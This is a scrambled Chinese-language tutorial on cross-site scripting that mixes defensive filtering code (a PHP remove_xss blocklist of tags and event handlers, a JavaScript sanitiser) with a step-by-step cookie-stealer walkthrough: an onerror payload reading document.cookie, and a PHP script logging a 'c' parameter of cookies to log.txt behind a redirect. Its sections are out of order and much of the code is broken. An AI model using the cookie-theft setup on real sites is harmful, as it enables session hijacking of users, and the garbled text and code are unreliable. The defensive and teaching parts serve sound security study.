Log文件中含有cookie的内容,说明我们成功的使用js代码窃取了cookies。

XSS防御

从以上的反射型和DOM
XSS攻击可以看出,我们不能原样的将用户输入的数据直接输出到页面,或者存到服务器,需要对数据进行一些处理。“永远不要相信用户输入!”,这句话是真理。

首先,对于一些能明确参数类型的,必须使用类型转换比如说intval,doubleval等转换。再者,如果有固定值的(比如只有BJ,SH,TJ等固定字符串值的),应该要判断用户提交的值是否在这些固定值内。

PHP直接输出 html
的,可以采用以下的方法进行过滤
1.htmlspecialchars函数2.htmlentities函数3.HTMLPurifier.auto.php插件4.remove_xss函数

function remove_xss { // remove all non-printable characters. CR and LF and TAB are allowed // this prevents some character re-spacing such as <java\0script> // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val); // straight replacements, the user should never need these since they're normal characters // this prevents like <IMG SRC=@avascript:alert> $search = 'abcdefghijklmnopqrstuvwxyz'; $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; $search .= '1234567890!@#$%^&*()'; $search .= '~`";:?+/={}[]-_|\'\\'; for ($i = 0; $i < strlen; $i++) { // ;? matches the ;, which is optional // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars // @ @ search for the hex values $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ; // @ @ 0{0,7} matches '0' zero to seven times $val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ; } // now the only remaining whitespace attacks are \t, \n, and \r $ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base'); $ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'); $ra = array_merge($ra1, $ra2); $found = true; // keep replacing as long as the previous round replaced something while ($found == true) { $val_before = $val; for ($i = 0; $i < sizeof; $i++) { $pattern = '/'; for ($j = 0; $j < strlen; $j++) { if ($j > 0) { $pattern .= '('; $pattern .= '(&#[xX]0{0,8}'; $pattern .= '|'; $pattern .= '|(&#0{0,8}([9|10|13]);)'; $pattern .= ')*'; } $pattern .= $ra[$i][$j]; } $pattern .= '/i'; $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags if ($val_before == $val) { // no replacements were made, so exit the loop $found = false; } } } return $val;}

PHP输出到JS代码中,或者开发Json
API的,则需要前端在JS中进行过滤
1.使用下面的parse函数,对输入的数据进行处理,返回处理之后的数据2.对输入的数据进行解码(使用第三方库
he.js)3.过滤掉一些元素有危害的元素节点与属性节点。如script标签,onerror事件等。(使用第三方库HTMLParser.js)

function parse  { // str假如为某个DOM字符串 // 1. result为处理之后的DOM节点 let result = '' // 2. 解码 let decode = he.unescape(str, { strict: true }) HTMLParser(decode, { start (tag, attrs, unary) { // 3. 过滤常见危险的标签 if (tag === 'script' || tag === 'img' || tag === 'link' || tag === 'style' || tag === 'iframe' || tag === 'frame') return result += `<${tag}` for (let i = 0; i < attrs.length; i++) { let name = (attrs[i].name).toLowerCase() let value = attrs[i].escaped // 3. 过滤掉危险的style属性和js事件 if (name === 'style' || name === 'href' || name === 'src' || ~name.indexOf continue result += ` ${name}=${value}` } result += `${unary ? ' /' : ''} >` }, chars  { result += text }, comment  { result += `<!-- ${text} -->` }, end  { result += `</${tag}>` } }) return result }

其它的通用的补充性防御手段1.在输出html时,加上Content Security
Policy的Http
Header作用:可以防止页面被XSS攻击时,嵌入第三方的脚本文件等缺陷:IE或低版本的浏览器可能不支持

2.在设置Cookie时,加上HttpOnly参数作用:可以防止页面被XSS攻击时,Cookie信息被盗取,可兼容至IE6缺陷:网站本身的JS代码也无法操作Cookie,而且作用有限,只能保证Cookie的安全

3.在开发API时,检验请求的Referer参数作用:可以在一定程度上防止CSRF攻击缺陷:IE或低版本的浏览器中,Referer参数可以被伪造

我们用来传递cookies到服务器的js字符串使用了document.cookie参数,但是我们用的是document.location中定义的url。

XSS危害

  • 通过document.cookie盗取cookie
  • 使用js或css破坏页面正常的结构与样式
  • 流量劫持(通过访问某段具有window.location.href定位到其他页面)
  • Dos攻击:利用合理的客户端请求来占用过多的服务器资源,从而使合法用户无法得到服务器响应。
  • 利用iframe、frame、XMLHttpRequest或上述Flash等方式,以用户的身份执行一些管理动作,或执行一些一般的如发微博、加好友、发私信等操作。
  • 利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动。

HTML页面代码应该是下面这样:

XSS的攻击方式

反射型 XSS

反射型XSS,也叫非持久型XSS,是指发生请求时,XSS代码出现在请求URL中,作为参数提交到服务器,服务器解析并响应。响应结果中包含XSS代码,最后浏览器解析并执行。

从概念上可以看出,反射型XSS代码是首先出现在URL中的,然后需要服务端解析,最后需要浏览器解析之后XSS代码才能够攻击。

我们举一个小栗子:使用express起一个web服务器,然后设置一下请求接口。通过ajax的GET请求将参数发往服务器,服务器解析成json后响应。将返回的数据直接解析后显示到页面上,没有对返回的数据进行解码和过滤等操作。

html代码

<textarea name="txt" cols="80" rows="10"><button type="button" >测试</button>

js代码

var test = document.querySelectortest.addEventListener('click', function () { var url = `/test?test=${txt.value}` // 1. 发送一个GET请求 var xhr = new XMLHttpRequest() xhr.onreadystatechange = function () { if (xhr.readyState === 4) { if ((xhr.status >= 200 && xhr.status < 300) || xhr.status === 304) { // 3. 客户端解析JSON,并执行 var str = JSON.parse(xhr.responseText).test var node = `${str}` document.body.insertAdjacentHTML('beforeend', node) } else { console.log('error', xhr.responseText) } } } xhr.open('GET', url, true) xhr.send}, false)

express代码

var express = require('express');var router = express.Router();router.get('/test', function (req, res, next) { // 2. 服务端解析成JSON后响应 res.json({ test: req.query.test })})

现在我们通过给textarea添加一段有攻击目的的img标签

<img src="null" onerror='alert(document.cookie)' />

现在,我们点击<测试>按钮,一个XSS攻击就发生了。下面图片中是获取了本地的部分cookie信息

图片 1xss

实际上,我们只是模拟攻击,通过alert获取到了个人的cookie信息。但是如果是黑客的话,他们会注入一段第三方的js代码,然后将获取到的cookie信息存到他们的服务器上。这样的话黑客们就有机会拿到我们的身份认证做一些违法的事情了。

以上,存在的一些问题,主要在于没有对用户输入的信息进行过滤,同时没有剔除掉DOM节点中存在的一些有危害的事件和一些有危害的DOM节点。

存储型 XSS

存储型XSS,也叫持久型XSS,主要是将XSS代码发送到服务器(不管是数据库、内存还是文件系统等。),然后在下次请求页面的时候就不用带上XSS代码了。

最典型的就是留言板XSS。用户提交了一条包含XSS代码的留言到数据库。当目标用户查询留言时,那些留言的内容会从服务器解析之后加载出来。浏览器发现有XSS代码,就当做正常的HTML和JS解析执行。XSS攻击就发生了。

DOM XSS

DOM XSS攻击不同于反射型XSS和存储型XSS,DOM
XSS代码不需要服务器端的解析响应的直接参与,而是通过浏览器端的DOM解析。这完全是客户端的事情。

DOM
XSS代码的攻击发生的可能在于我们编写JS代码造成的。我们知道eval语句有一个作用是将一段字符串转换为真正的JS语句,因此在JS中使用eval是很危险的事情,容易造成XSS攻击,应避免使用eval语句。

Step 6: 攻击

什么是XSS攻击

XSS, 即为(Cross Site Scripting), 中文名为跨站脚本,
是发生在目标用户的浏览器层面上的,当渲染DOM树的过程成发生了不在预期内执行的JS代码时,就发生了XSS攻击。

跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际上是在目标网站的作用域下执行了这段js代码。

为不和层叠样式表(Cascading Style Sheets,
CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。

该攻击可以注入到任何的HTML文件的<script>标签中。常用的检测XSS的方法是使用alert。

图片 2

该脚本要插入到HTML的<body>部分,如下:

2. 定义保存cookie的文件,这个文件保存的位置应该是我们控制的。

在本例中,PHP文件定位到localhost(127.0.0.1)。

总结

Cookie是站点请求和保持特定访问页面的信息。Cookie含有访问的方式、时间、用户名密码等认证信息等。当用户访问给定站点时,必须使用cookie;如果攻击者可以拦截cookie,就可以利用cookie窃取用户的一些信息。对某个特定的域名,使用JS可以保存或修改用户的cookie。也就是说,如果攻击者可以利用JS查看、修改cookie,那么这可以变成一种有价值的黑客技术。

在现实的攻击中,黑客会特别注意PHP文件的位置。如果处理得不好,php文件会容易暴露黑客的位置。如果这种攻击出现了,那么根据cookie被发送和保存的位置,可以追踪黑客。

Step 5: 测试Cookie Stealer

<?php
header ('Location:https://google.com');
?>

首先,创建一个标准的HTML页

最后,我们可以检查我们网站目录下的log.txt文件来查看cookies。

图片 3

1. 分配cookie到一个变量;

Step 4: 用PHP处理Cookies

fwrite($file, $cookies . "nn");

如果运行该脚本的页面打开了,那么就会设定cookie,但是浏览器中不会显示任何东西。我们可以用document.write函数直接查看cookie。

查看PHP服务器的日志,我们注意到传递给php文件一个参数,而且php代码执行了。

图片 4

Step 3: 用js脚本窃取Cookies

 <script type="text/javascript">
 document.cookie = "username=Null Byte";
 document.write(document.cookie);
 </script>

图片 5

图片 6

如果目标是社交媒体网站,脚本需要注入到该站点中,窃取的cookies要发送给黑客控制的IP或URL。

然后,需要准备PHP文件的测试环境。

在index.html 和 cookiestealer.php相同目录下,搭建一个测试用的PHP环境。

页面测试成功。

Step 1: 创建 HTML Test 页

cat log.txt

php -S 127.0.0.1:80

Cookies含有重要的用户信息,一般是明文的,有时甚至含有私钥信息。所以非常重要,使用js代码注入可以窃取用户的cookies信息。

图片 7

$cookies = $_GET"c";

测试页面

mkdir cookiestealer
cd cookiestealer
touch index.html

首先,在index.html相同目录下创新PHP文件。